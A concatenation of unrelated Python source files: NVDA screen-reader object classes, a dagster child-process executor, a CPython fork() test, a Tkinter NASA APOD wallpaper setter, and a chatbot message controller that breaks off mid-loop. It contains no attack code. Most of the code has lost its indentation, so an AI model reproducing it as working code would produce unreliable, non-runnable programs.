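        groups[line[0]].append(line[2:])
    return groups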
class Terminal(LiveText, EditableText):
"""An object which both accepts text input and outputs text which should be reported automatically.
This is an L{EditableText} object,
as well as a L{LiveText} object for which monitoring is automatically enabled and disabled based on whether it has focus.
"""
role = controlTypes.ROLE_TERMINAL
def event_gainFocus(self):
super(Terminal, self).event_gainFocus()
self.startMonitoring()
def event_loseFocus(self):
super(Terminal, self).event_loseFocus()
self.stopMonitoring()
def _get_caretMovementDetectionUsesEvents(self):
"""Using caret events in consoles sometimes causes the last character of the
prompt to be read when quickly deleting text."""
return False
class KeyboardHandlerBasedTypedCharSupport(Terminal):
"""A Terminal object that also provides typed character support for
console applications via keyboardHandler events.
These events are queued from NVDA's global keyboard hook.
Therefore, an event is fired for every single character that is being typed,
even when a character is not written to the console (e.g. in read only console applications).
This approach is an alternative to monitoring the console output for
characters close to the caret, or injecting in-process with NVDAHelper.
This class relies on the toUnicodeEx Windows function, and in particular
the flag to preserve keyboard state available in Windows 10 1607
and later."""
#: Whether this object quickly and reliably sends textChange events
#: when its contents update.
#: Timely and reliable textChange events are required
#: to support password suppression.
_supportsTextChange = True
#: A queue of typed characters, to be dispatched on C{textChange}.
#: This queue allows NVDA to suppress typed passwords when needed.
_queuedChars = []
#: Whether the last typed character is a tab.
#: If so, we should temporarily disable filtering as completions may
#: be short.
_hasTab = False
def _reportNewLines(self, lines):
# Perform typed character filtering, as typed characters are handled with events.
if (
len(lines) == 1
and not self._hasTab
and len(lines[0].strip()) < max(len(speech.curWordChars) + 1, 3)
):
return
super()._reportNewLines(lines)
def event_typedCharacter(self, ch):
if ch == '\t':
self._hasTab = True
# Clear the typed word buffer for tab completion.
speech.clearTypedWordBuffer()
else:
self._hasTab = False
if (
(
config.conf['keyboard']['speakTypedCharacters']
or config.conf['keyboard']['speakTypedWords']
)
and not config.conf['terminals']['speakPasswords']
and self._supportsTextChange
):
self._queuedChars.append(ch)
else:
super().event_typedCharacter(ch)
def event_textChange(self):
self._dispatchQueue()
super().event_textChange()
@script(gestures=[
"kb:enter",
"kb:numpadEnter",
"kb:tab",
"kb:control+c",
"kb:control+d",
"kb:control+pause"
])
def script_flush_queuedChars(self, gesture):
"""
Flushes the typed word buffer and queue of typedCharacter events if present.
Since these gestures clear the current word/line, we should flush the
queue to avoid erroneously reporting these chars.
"""
self._queuedChars = []
speech.clearTypedWordBuffer()
gesture.send()
def _calculateNewText(self, newLines, oldLines):
hasNewLines = (
self._findNonBlankIndices(newLines)
!= self._findNonBlankIndices(oldLines)
)
if hasNewLines:
# Clear the typed word buffer for new text lines.
speech.clearTypedWordBuffer()
self._queuedChars = []
return super()._calculateNewText(newLines, oldLines)
def _dispatchQueue(self):
"""Sends queued typedCharacter events through to NVDA."""
while self._queuedChars:
ch = self._queuedChars.pop(0)
super().event_typedCharacter(ch)
def _findNonBlankIndices(self, lines):
"""
Given a list of strings, returns a list of indices where the strings
are not empty.
"""
return [index for index, line in enumerate(lines) if line]
class CandidateItem(NVDAObject):
def getFormattedCandidateName(self,number,candidate):
if config.conf["inputComposition"]["alwaysIncludeShortCharacterDescriptionInCandidateName"]:
describedSymbols=[]
for symbol in candidate:
try:
symbolDescriptions=characterProcessing.getCharacterDescription(speech.getCurrentLanguage(),symbol) or []
except TypeError:
symbolDescriptions=[]
if len(symbolDescriptions)>=1:
description=symbolDescriptions[0]
if description.startswith('(') and description.endswith(')'):
describedSymbols.append(description[1:-1])
else:
# Translators: a message announcing a candidate's character and description.
describedSymbols.append(_(u"{symbol} as in {description}").format(symbol=symbol,description=description))
else:
describedSymbols.append(symbol)
candidate=u", ".join(describedSymbols)
# Translators: a formatted message announcing a candidate's number and candidate text.
return _(u"{number} {candidate}").format(number=number,candidate=candidate)
def getFormattedCandidateDescription(self,candidate):
descriptions=[]
numSymbols=len(candidate) if candidate else 0
if numSymbols!=1: return u""
symbol=candidate[0]
try:
symbolDescriptions=characterProcessing.getCharacterDescription(speech.getCurrentLanguage(),symbol) or []
except TypeError:
symbolDescriptions=[]
if config.conf["inputComposition"]["alwaysIncludeShortCharacterDescriptionInCandidateName"]:
symbolDescriptions=symbolDescriptions[1:]
if len(symbolDescriptions)<1: return u""
return u", ".join(symbolDescriptions)
def reportFocus(self):
if not config.conf["inputComposition"]["announceSelectedCandidate"]: return
text=self.name
desc=self.description
if desc:
text+=u", "+desc
speech.speakText(text)
def _get_visibleCandidateItemsText(self):
obj=self
textList=[]
while isinstance(obj,CandidateItem) and isinstance(obj.candidateNumber,int) and controlTypes.STATE_INVISIBLE not in obj.states:
textList.append(obj.name)
obj=obj.previous
textList.reverse()
obj=self.next
while isinstance(obj,CandidateItem) and isinstance(obj.candidateNumber,int) and controlTypes.STATE_INVISIBLE not in obj.states:
textList.append(obj.name)
obj=obj.next
if len(textList)<=1: return None
self.visibleCandidateItemsText=(u", ".join(textList))+u", "
return self.visibleCandidateItemsText
class RowWithFakeNavigation(NVDAObject):
"""Provides table navigation commands for a row which doesn't support them natively.
The cells must be exposed as children and they must support the table cell properties.
"""
_savedColumnNumber = None
def _moveToColumn(self, obj):
if not obj:
ui.message(_("Edge of table"))
return
if obj is not self:
# Use the focused copy of the row as the parent for all cells to make comparison faster.
obj.parent = self
api.setNavigatorObject(obj)
speech.speakObject(obj, reason=controlTypes.REASON_FOCUS)
def _moveToColumnNumber(self, column):
child = column - 1
if child >= self.childCount:
return
cell = self.getChild(child)
self._moveToColumn(cell)
def script_moveToNextColumn(self, gesture):
cur = api.getNavigatorObject()
if cur == self:
new = self.simpleFirstChild
elif cur.parent != self:
new = self
else:
new = cur.simpleNext
self._moveToColumn(new)
script_moveToNextColumn.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToNextColumn.__doc__ = _("Moves the navigator object to the next column")
def script_moveToPreviousColumn(self, gesture):
cur = api.getNavigatorObject()
if cur == self:
new = None
elif cur.parent != self or not cur.simplePrevious:
new = self
else:
new = cur.simplePrevious
self._moveToColumn(new)
script_moveToPreviousColumn.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToPreviousColumn.__doc__ = _("Moves the navigator object to the previous column")
def reportFocus(self):
col = self._savedColumnNumber
if not col:
return super(RowWithFakeNavigation, self).reportFocus()
self.__class__._savedColumnNumber = None
self._moveToColumnNumber(col)
def _moveToRow(self, row):
if not row:
return self._moveToColumn(None)
nav = api.getNavigatorObject()
if nav != self and nav.parent == self:
self.__class__._savedColumnNumber = nav.columnNumber
row.setFocus()
def script_moveToNextRow(self, gesture):
self._moveToRow(self.next)
script_moveToNextRow.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToNextRow.__doc__ = _("Moves the navigator object and focus to the next row")
def script_moveToPreviousRow(self, gesture):
self._moveToRow(self.previous)
script_moveToPreviousRow.canPropagate = True
# Translators: The description of an NVDA command.
script_moveToPreviousRow.__doc__ = _("Moves the navigator object and focus to the previous row")
__gestures = {
"kb:control+alt+rightArrow": "moveToNextColumn",
"kb:control+alt+leftArrow": "moveToPreviousColumn",
"kb:control+alt+downArrow": "moveToNextRow",
"kb:control+alt+upArrow": "moveToPreviousRow",
}
class RowWithoutCellObjects(NVDAObject):
"""An abstract class which creates cell objects for table rows which don't natively expose them.
Subclasses must override L{_getColumnContent} and can optionally override L{_getColumnHeader}
to retrieve information about individual columns.
The parent (table) must support the L{columnCount} property.
"""
def _get_childCount(self):
return self.parent.columnCount
def _getColumnLocation(self,column):
"""Get the screen location for the given column.
Subclasses may optionally override this method.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: tuple
"""
raise NotImplementedError
def _getColumnContent(self, column):
"""Get the text content for a given column of this row.
Subclasses must override this method.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: str
"""
raise NotImplementedError
def _getColumnHeader(self, column):
"""Get the header text for this column.
@param column: The index of the column, starting at 1.
@type column: int
@rtype: str
"""
raise NotImplementedError
def _makeCell(self, column):
if column == 0 or column > self.childCount:
return None
return _FakeTableCell(parent=self, column=column)
def _get_firstChild(self):
return self._makeCell(1)
def _get_children(self):
return [self._makeCell(column) for column in range(1, self.childCount + 1)]
def getChild(self, index):
return self._makeCell(index + 1)
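# Hedged sketch (not part of NVDA): a minimal RowWithoutCellObjects subclass for a
# hypothetical row whose text lives in self.name as a tab-delimited string. The
# parent is assumed to expose columnCount (as required above) plus an illustrative
# columnHeaders sequence.
class _ExampleDelimitedRow(RowWithoutCellObjects):
    def _getColumnContent(self, column):
        # Column indices are 1-based, as documented above.
        return self.name.split("\t")[column - 1]
    def _getColumnHeader(self, column):
        return self.parent.columnHeaders[column - 1]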
class _FakeTableCell(NVDAObject):
role = controlTypes.ROLE_TABLECELL
def __init__(self, parent=None, column=None):
super(_FakeTableCell, self).__init__()
self.parent = parent
self.columnNumber = column
try:
self.rowNumber = self.parent.positionInfo["indexInGroup"]
except KeyError:
pass
self.processID = parent.processID
try:
# HACK: Some NVDA code depends on window properties, even for non-Window objects.
self.windowHandle = parent.windowHandle
self.windowClassName = parent.windowClassName
self.windowControlID = parent.windowControlID
except AttributeError:
pass
def _get_next(self):
return self.parent._makeCell(self.columnNumber + 1)
def _get_previous(self):
return self.parent._makeCell(self.columnNumber - 1)
firstChild = None
def _get_location(self):
try:
return self.parent._getColumnLocation(self.columnNumber)
except NotImplementedError:
return None
def _get_name(self):
return self.parent._getColumnContent(self.columnNumber)
def _get_columnHeaderText(self):
return self.parent._getColumnHeader(self.columnNumber)
def _get_tableID(self):
return id(self.parent.parent)
def _get_states(self):
states = self.parent.states.copy()
if not self.location or self.location.width == 0:
states.add(controlTypes.STATE_INVISIBLE)
return states
class FocusableUnfocusableContainer(NVDAObject):
"""Makes an unfocusable container focusable using its first focusable descendant.
One instance where this is useful is ARIA applications on the web where the author hasn't set a tabIndex.
"""
isFocusable = True
def setFocus(self):
for obj in self.recursiveDescendants:
if obj.isFocusable:
obj.setFocus()
break
class ToolTip(NVDAObject):
"""Provides information about an item over which the user is hovering a cursor.
The object should fire a show event when it appears.
"""
role = controlTypes.ROLE_TOOLTIP
def event_show(self):
if not config.conf["presentation"]["reportTooltips"]:
return
speech.speakObject(self, reason=controlTypes.REASON_FOCUS)
# Ideally, we wouldn't use getBrailleTextForProperties directly.
braille.handler.message(braille.getBrailleTextForProperties(name=self.name, role=self.role))
class Notification(NVDAObject):
"""Informs the user of non-critical information that does not require immediate action.
This is primarily for notifications displayed in the system notification area, and for Windows 8 and later, toasts.
The object should fire an alert or show event when the user should be notified.
"""
def event_alert(self):
if not config.conf["presentation"]["reportHelpBalloons"]:
return
speech.speakObject(self, reason=controlTypes.REASON_FOCUS)
# Ideally, we wouldn't use getBrailleTextForProperties directly.
braille.handler.message(braille.getBrailleTextForProperties(name=self.name, role=self.role))
event_show = event_alert
class EditableTextWithSuggestions(NVDAObject):
"""Allows NVDA to announce appearance/disappearance of suggestions as text is entered.
This is used in various places, including Windows 10 search edit fields and others.
Subclasses should provide L{event_suggestionsOpened} and can optionally override L{event_suggestionsClosed}.
These events are fired when suggestions appear and disappear, respectively.
"""
def event_suggestionsOpened(self):
"""Called when suggestions appear when text is entered e.g. search suggestions.
Subclasses should provide custom implementations if possible.
By default NVDA will announce the appearance of suggestions in braille and, if configured, play a sound.
"""
# Translators: Announced in braille when suggestions appear when search term is entered in various search fields such as Start search box in Windows 10.
braille.handler.message(_("Suggestions"))
if config.conf["presentation"]["reportAutoSuggestionsWithSound"]:
nvwave.playWaveFile(r"waves\suggestionsOpened.wav")
def event_suggestionsClosed(self):
"""Called when suggestions list or container is closed.
Subclasses should provide custom implementations if possible.
By default NVDA will play a sound, if configured to report suggestion sounds.
"""
if config.conf["presentation"]["reportAutoSuggestionsWithSound"]:
nvwave.playWaveFile(r"waves\suggestionsClosed.wav")
class WebDialog(NVDAObject):
"""
A dialog that will use a treeInterceptor if its parent currently does.
This can be used to ensure that dialogs on the web get browseMode by default, unless inside an ARIA application
"""
def _get_shouldCreateTreeInterceptor(self):
if self.parent.treeInterceptor:
return True
return False
|
child_process_executor.py
|
"""Facilities for running arbitrary commands in child processes."""
import os
import queue
import sys
from abc import ABC, abstractmethod
from typing import NamedTuple
import dagster._check as check
from dagster.core.errors import DagsterExecutionInterruptedError
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from dagster.utils.interrupts import capture_interrupts
class ChildProcessEvent:
pass
class ChildProcessStartEvent(
NamedTuple("ChildProcessStartEvent", [("pid", int)]), ChildProcessEvent
):
pass
class ChildProcessDoneEvent(NamedTuple("ChildProcessDoneEvent", [("pid", int)]), ChildProcessEvent):
pass
class ChildProcessSystemErrorEvent(
NamedTuple(
"ChildProcessSystemErrorEvent", [("pid", int), ("error_info", SerializableErrorInfo)]
),
ChildProcessEvent,
):
pass
class ChildProcessCommand(ABC): # pylint: disable=no-init
"""Inherit from this class in order to use this library.
The object must be picklable; instantiate it and pass it to _execute_command_in_child_process."""
@abstractmethod
def execute(self):
"""This method is invoked in the child process.
Yields a sequence of events to be handled by _execute_command_in_child_process."""
class ChildProcessCrashException(Exception):
"""Thrown when the child process crashes."""
def __init__(self, exit_code=None):
self.exit_code = exit_code
super().__init__()
def _execute_command_in_child_process(event_queue, command):
"""Wraps the execution of a ChildProcessCommand.
Handles errors and communicates across a queue with the parent process."""
check.inst_param(command, "command", ChildProcessCommand)
with capture_interrupts():
pid = os.getpid()
event_queue.put(ChildProcessStartEvent(pid=pid))
try:
for step_event in command.execute():
event_queue.put(step_event)
event_queue.put(ChildProcessDoneEvent(pid=pid))
except (
Exception,
KeyboardInterrupt,
DagsterExecutionInterruptedError,
):
event_queue.put(
ChildProcessSystemErrorEvent(
pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
TICK = 20.0 * 1.0 / 1000.0
"""The minimum interval at which to check for child process liveness -- default 20ms."""
PROCESS_DEAD_AND_QUEUE_EMPTY = "PROCESS_DEAD_AND_QUEUE_EMPTY"
"""Sentinel value."""
def _poll_for_event(process, event_queue):
try:
return event_queue.get(block=True, timeout=TICK)
except queue.Empty:
if not process.is_alive():
# There is a possibility that after the last queue.get the
# process created another event and then died. In that case
# we want to continue draining the queue.
try:
return event_queue.get(block=False)
except queue.Empty:
# If the queue is empty we know that there are no more events
# and that the process has died.
return PROCESS_DEAD_AND_QUEUE_EMPTY
return None
def execute_child_process_command(multiprocessing_ctx, command):
"""Execute a ChildProcessCommand in a new process.
This function starts a new process whose execution target is a ChildProcessCommand wrapped by
_execute_command_in_child_process; polls the queue for events yielded by the child process
until the process dies and the queue is empty.
This function yields a complex set of objects to enable having multiple child process
executions in flight:
* None - nothing has happened, yielded to enable cooperative multitasking with other iterators
* ChildProcessEvent - Family of objects that communicates state changes in the child process
    * KeyboardInterrupt - Yielded in the case that an interrupt was received while
polling the child process. Yielded instead of raised to allow forwarding of the
interrupt to the child and completion of the iterator for this child and
any others that may be executing
* The actual values yielded by the child process command
Args:
multiprocessing_ctx: The multiprocessing context to execute in (spawn, forkserver, fork)
command (ChildProcessCommand): The command to execute in the child process.
Warning: if the child process is in an infinite loop, this will
also infinitely loop.
"""
check.inst_param(command, "command", ChildProcessCommand)
event_queue = multiprocessing_ctx.Queue()
try:
process = multiprocessing_ctx.Process(
target=_execute_command_in_child_process, args=(event_queue, command)
)
process.start()
completed_properly = False
while not completed_properly:
event = _poll_for_event(process, event_queue)
if event == PROCESS_DEAD_AND_QUEUE_EMPTY:
break
yield event
if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)):
completed_properly = True
if not completed_properly:
# TODO Figure out what to do about stderr/stdout
raise ChildProcessCrashException(exit_code=process.exitcode)
process.join()
finally:
event_queue.close()
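# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the original module): shows how
# the values yielded by a command interleave with the ChildProcessEvent family
# when consuming execute_child_process_command. _EchoCommand is a hypothetical
# example class; everything else is defined above or in the stdlib, and the
# sketch assumes this module's dagster dependencies are importable.
# ---------------------------------------------------------------------------
class _EchoCommand(ChildProcessCommand):
    """Toy picklable command that just yields the values it was given."""

    def __init__(self, values):
        self.values = values

    def execute(self):
        for value in self.values:
            yield value


if __name__ == "__main__":
    import multiprocessing

    ctx = multiprocessing.get_context("spawn")
    for event in execute_child_process_command(ctx, _EchoCommand(["a", "b", "c"])):
        if event is None:
            continue  # nothing happened this tick; keep cooperating
        if isinstance(event, ChildProcessEvent):
            print("lifecycle event:", type(event).__name__)
        else:
            print("value from child:", event)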
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import threading
import time
import unittest
from test.fork_wait import ForkWait
from test.support import reap_children, get_attribute, verbose
# Skip test if fork does not exist.
get_attribute(os, 'fork')
if sys._built_with_asan:
raise unittest.SkipTest("ASAN deadlocks post fork in several test suites")
class ForkTest(ForkWait):
def wait_impl(self, cpid):
deadline = time.monotonic() + 10.0
while time.monotonic() <= deadline:
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(0.1)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
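# Illustrative sketch (not part of the original test suite): the non-blocking
# fork()/waitpid(WNOHANG) polling pattern that wait_impl() above relies on,
# shown in isolation. The helper name is made up for this example and it is
# POSIX-only, like the tests themselves.
def _demo_fork_and_poll(timeout=10.0):
    pid = os.fork()
    if pid == 0:
        os._exit(0)  # child: exit immediately with status 0
    deadline = time.monotonic() + timeout
    while time.monotonic() <= deadline:
        # With WNOHANG, waitpid() returns (0, 0) while the child is still
        # running instead of blocking, so the parent can keep polling.
        spid, status = os.waitpid(pid, os.WNOHANG)
        if spid == pid:
            return status >> 8  # exit status, decoded as in wait_impl() above
        time.sleep(0.1)
    raise RuntimeError("child did not exit within %s seconds" % timeout)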
def tearDownModule():
reap_children()
if __name__ == "__main__":
unittest.main()
|
manual_wallpaper_changer.py
|
from tkinter import *
from tkcalendar import DateEntry
from datetime import date
from datetime import timedelta
from win10toast import ToastNotifier
import apod_object_parser
import wallpaper_utility
import threading
def setWallpaperByDate(cal):
disableButtons()
response = apod_object_parser.get_data_by_date( wallpaper_utility.APOD_API_KEY, cal.get_date() )
hd_url = setResultAndGetHdUrl(response)
image_date = apod_object_parser.get_date(response)
setWallpaperByHdUrl(hd_url, image_date)
enableButtons()
exit()
def setWallpaperByDateThreaded(cal):
print("setting wallpaper by date")
e = threading.Event()
t = threading.Thread(target=setWallpaperByDate, args=(cal,))
t.start()
# t.join(30)
# if t.is_alive:
# result.set("request timed out")
# e.set()
# t.join()
def setTodaysPicAsWalpaper():
disableButtons()
response = apod_object_parser.get_data(wallpaper_utility.APOD_API_KEY)
hd_url = setResultAndGetHdUrl(response)
image_date = apod_object_parser.get_date(response)
setWallpaperByHdUrl(hd_url, image_date)
enableButtons()
exit()
def setTodaysPicAsWalpaperThreaded():
e = threading.Event()
t = threading.Thread(target=setTodaysPicAsWalpaper)
t.start()
# t.join(30)
# if t.is_alive:
# result.set("request timed out")
# e.set()
# t.join()
# user defined helper functions
def setResultAndGetHdUrl(response):
try:
print("Sending request")
hd_url = apod_object_parser.get_hdurl(response)
print("Request received")
result.set("url received! :)")
return hd_url
    except Exception:
        result.set("This date's post is not an image :(")
return None
def setWallpaperByHdUrl(hd_url, image_date):
print(" hd_url's image date: "+image_date)
if (hd_url != None):
image_downloaded_path = apod_object_parser.download_image(hd_url, image_date)
wallpaper_utility.changeBG(image_downloaded_path)
result.set("success! :)")
n.show_toast(wallpaper_utility.SERVICE_NAME, "Wallpaper changed!", duration = 7,)
def disableButtons():
setButton["state"] = "disabled"
useTodaysPic["state"] = "disabled"
def enableButtons():
setButton["state"] = "normal"
useTodaysPic["state"] = "normal"
root = Tk()
root.title("NASA APOD Image Setter")
root.configure(bg='light grey')
n = ToastNotifier()
result = StringVar()
path = StringVar()
Label(root, text="Status : ", bg = "light grey").grid(row=3, sticky=W)
Label(root, text="",textvariable=result, bg = "light grey").grid(row=3, column=1, sticky=W)
yesterdayDate = date.today() - timedelta(days=1)
cal = DateEntry(root, maxdate = yesterdayDate, date_pattern='dd/mm/yyyy')
cal.grid(row = 0, column = 2, columnspan=2, rowspan=2, padx=5, pady=5,)
setButton = Button(root, text="Set as wallpaper", command= lambda : setWallpaperByDateThreaded(cal), bg="white")
setButton.grid(row=2, column=2, columnspan=2, rowspan=2, padx=5, pady=5,)
useTodaysPic = Button(root, text="use today's Pic", command= setTodaysPicAsWalpaperThreaded, bg="white")
useTodaysPic.grid(row=4, column=2, columnspan=2, rowspan=2, padx=5, pady=5,)
Label( root, text = "Choose a day from when you need the pic from:", bg="light grey" ).grid(row=0, sticky=W)
mainloop()
|
controller.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import sys
from threading import Thread
from types import LambdaType
from apscheduler.schedulers.background import BackgroundScheduler
from typing import Optional, List
from typing import Text
from conversationinsights.actions.action import ActionListen, ActionRestart
from conversationinsights.channels import UserMessage
from conversationinsights.channels.direct import CollectingOutputChannel
from conversationinsights.dispatcher import Dispatcher
from conversationinsights.domain import Domain
from conversationinsights.events import Restart, Reminder
from conversationinsights.events import UserUtterance, ExecutedAction
from conversationinsights.interpreter import NaturalLanguageInterpreter
from conversationinsights.interpreter import RegexInterpreter
from conversationinsights.policies.ensemble import PolicyEnsemble
from conversationinsights.tracker_store import TrackerStore
from conversationinsights.trackers import DialogueStateTracker
scheduler = BackgroundScheduler()
scheduler.start()
try:
# noinspection PyCompatibility
from Queue import Queue, Empty
except ImportError:
# noinspection PyCompatibility
from queue import Queue, Empty
logger = logging.getLogger(__name__)
class MessageQueue(object):
def enqueue(self, message):
# type: (UserMessage) -> None
"""Add a message to the queue."""
raise NotImplementedError
def dequeue(self):
# type: () -> Optional[UserMessage]
"""Remove a message from the queue."""
raise NotImplementedError
class InMemoryMessageQueue(MessageQueue):
def __init__(self):
self.queue = Queue()
def enqueue(self, message):
# type: (UserMessage) -> None
"""Add a message to the queue to be handled."""
self.queue.put(message)
def dequeue(self):
# type: () -> Optional[UserMessage]
"""Remove a message from the queue (the one who removes it should also handle it!)"""
try:
return self.queue.get(block=True)
except Empty:
return None
def join(self):
# type: () -> None
"""Wait until all messages in the queue have been processed."""
self.queue.join()
class Controller(object):
def __init__(self, interpreter, policy_ensemble, domain, tracker_store, message_preprocessor=None):
# type: (NaturalLanguageInterpreter, PolicyEnsemble, Domain, TrackerStore, Optional[LambdaType]) -> None
self.tracker_store = tracker_store
self.domain = domain
self.policy_ensemble = policy_ensemble
self.interpreter = interpreter
self.threads = []
self.message_preprocessor = message_preprocessor
def handle_asynchronous(self, input_channel=None, message_queue=None, num_processing_threads=1):
# type: (InputChannel, Dequeue, int) -> None
"""Handle the messages coming from the input channel asynchronously in child threads.
Spawns a number of threads to handle the messages that reach the input channel."""
if message_queue is None:
message_queue = InMemoryMessageQueue()
# hook up input channel
if input_channel is not None:
listener_thread = Thread(target=input_channel.start_async_listening, args=[message_queue])
listener_thread.daemon = True
listener_thread.start()
self.threads.append(listener_thread)
# create message processors
for i in range(0, num_processing_threads):
message_processor = self.create_processor()
processor_thread = Thread(target=message_processor.handle_channel_asynchronous, args=[message_queue])
processor_thread.daemon = True
processor_thread.start()
self.threads.append(processor_thread)
def handle_channel(self, input_channel=None):
# type: (InputChannel) -> None
"""Handle messages coming from the channel."""
message_processor = self.create_processor()
message_processor.handle_channel(input_channel)
def handle_message(self, message):
# type: (UserMessage) -> Optional[List[Text]]
"""Handle a single messages with a processor."""
message_processor = self.create_processor()
return message_processor.handle_message(message)
def serve_forever(self):
# type: () -> None
"""Block until all child threads have been terminated."""
while len(self.threads) > 0:
try:
# Join all threads using a timeout so it doesn't block
# Filter out threads which have been joined or are None
                [t.join(1000) for t in self.threads]
                self.threads = [t for t in self.threads if t.is_alive()]
except KeyboardInterrupt:
logger.info("Ctrl-c received! Sending kill to threads...")
# It would be better at this point to properly shutdown every thread (e.g. by setting a flag on it)
# Unfortunately, there are IO operations that are blocking without a timeout (e.g. sys.read)
# so threads that are waiting for one of these calls can't check the set flag. Hence, we go the easy
# route for now
sys.exit(0)
logger.info("Finished waiting for input threads to terminate. Stopping to serve forever.")
def create_processor(self):
# type: () -> MessageProcessor
"""Create a message processor for the message handling."""
return MessageProcessor(self.interpreter, self.policy_ensemble, self.domain, self.tracker_store,
message_preprocessor=self.message_preprocessor)
class MessageProcessor(object):
def __init__(self,
interpreter,
policy_ensemble,
domain,
tracker_store,
max_number_of_predictions=10,
message_preprocessor=None,
on_circuit_break=None):
# type: (NaturalLanguageInterpreter, PolicySelector, Domain, TrackerStore, int, LambdaType, LambdaType) -> None
self.interpreter = interpreter
self.policy_ensemble = policy_ensemble
self.domain = domain
self.tracker_store = tracker_store
self.max_number_of_predictions = max_number_of_predictions
self.on_circuit_break = on_circuit_break
self.message_preprocessor = message_preprocessor
def handle_channel(self, input_channel=None):
# type: (InputChannel) -> None
"""Handles the input channel synchronously. Each message gets processed directly after it got received."""
input_channel.start_sync_listening(self.handle_message)
def handle_channel_asynchronous(self, message_queue):
"""Handles incoming messages from the message queue.
An input channel should add messages to the queue asynchronously."""
while True:
message = message_queue.dequeue()
if message is None:
continue
self.handle_message(message)
def handle_message(self, message):
# type: (UserMessage) -> Optional[List[Text]]
"""Handle a single message with this processor."""
# preprocess message if necessary
if self.message_preprocessor is not None:
message.text = self.message_preprocessor(message.text)
# we have a Tracker instance for each user
# which maintains conversation state
tracker = self._get_tracker(message.sender_id)
self._handle_message_with_tracker(message, tracker)
self._predict_and_execute_next_action(message, tracker)
# save tracker state to continue conversation from this state
self._save_tracker(tracker)
if isinstance(message.output_channel, CollectingOutputChannel):
return [outgoing_message for sender, outgoing_message in message.output_channel.messages]
else:
return None
def handle_reminder(self, reminder_event, dispatcher):
# type: (Reminder, Dispatcher) -> None
"""Handle a reminder that is triggered asynchronously."""
def has_message_after_reminder(tracker):
"""If the user sent a message after the reminder got scheduled - it might be better to cancel it."""
for e in reversed(tracker.events):
if isinstance(e, Reminder) and e.id == reminder_event.id:
return False
elif isinstance(e, UserUtterance):
return True
return True # tracker has probably been restarted
tracker = self._get_tracker(dispatcher.sender)
if reminder_event.kill_on_user_message and has_message_after_reminder(tracker):
logger.debug("Canceled reminder because it is outdated. (event: {} id: {})".format(
reminder_event.action_name, reminder_event.id))
else:
# necessary for proper featurization, otherwise the previous unrelated message would influence featurization
tracker.log_event(UserUtterance.empty())
should_continue = self._run_action(
self.domain.action_for_name(reminder_event.action_name), tracker, dispatcher)
if should_continue:
self._predict_and_execute_next_action(
UserMessage(None, dispatcher.output_channel, dispatcher.sender), tracker)
# save tracker state to continue conversation from this state
self._save_tracker(tracker)
def _parse_message(self, message):
# for testing - you can short-cut the NLU part with a message
# in the format _intent[entity1=val1,entity=val2]
# parse_data is a dict of intent & entities
if message.text.startswith('_'):
parse_data = RegexInterpreter().parse(message.text)
else:
parse_data = self.interpreter.parse(message.text)
logger.debug("Received user message '{}' with intent '{}' and entities '{}'".format(
message.text, parse_data["intent"], parse_data["entities"]))
return parse_data
def _handle_message_with_tracker(self, message, tracker):
# type: (UserMessage, DialogueStateTracker) -> None
parse_data = self._parse_message(message)
# We don't ever directly mutate the tracker, but instead pass it events to log.
tracker.log_event(UserUtterance(message.text, parse_data["intent"], parse_data["entities"], parse_data))
# first thing that will be done before the action loop is to store all entities as slots
for e in self.domain.slots_for_entities(parse_data["entities"]):
tracker.log_event(e)
logger.debug("Logged UserUtterance - tracker now has {} events".format(len(tracker.events)))
def _should_handle_message(self, tracker):
return not tracker.paused or tracker.latest_message.intent.get("name") == self.domain.restart_intent
def _predict_and_execute_next_action(self, message, tracker):
# this will actually send the response to the user
dispatcher = Dispatcher(message.sender_id, message.output_channel, self.domain)
# We will keep taking actions decided by the policy until it chooses to 'listen'
should_predict_another_action = True
number_of_predicted_actions = 0
# Log currently set slots
logger.debug("Current slot values: \n" +
"\n".join(["\t{}: {}".format(s.name, s.value) for s in tracker.slots.values()]))
# action loop. predicts actions until we hit the "listen for user input" action
while self._should_handle_message(tracker) and \
should_predict_another_action and \
number_of_predicted_actions < self.max_number_of_predictions:
